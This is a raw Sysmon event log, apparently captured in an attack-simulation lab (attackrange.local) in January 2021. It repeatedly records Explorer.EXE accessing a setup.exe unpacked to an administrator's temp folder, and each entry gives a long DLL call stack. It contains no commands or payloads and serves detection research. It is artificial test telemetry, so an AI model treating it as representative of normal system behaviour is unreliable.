13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014762Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014761Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014760Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014759Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014758Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014757Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014756Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014755Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014754Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014753Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014752Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014751Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014750Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014749Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014748Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014747Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014746Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.302{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 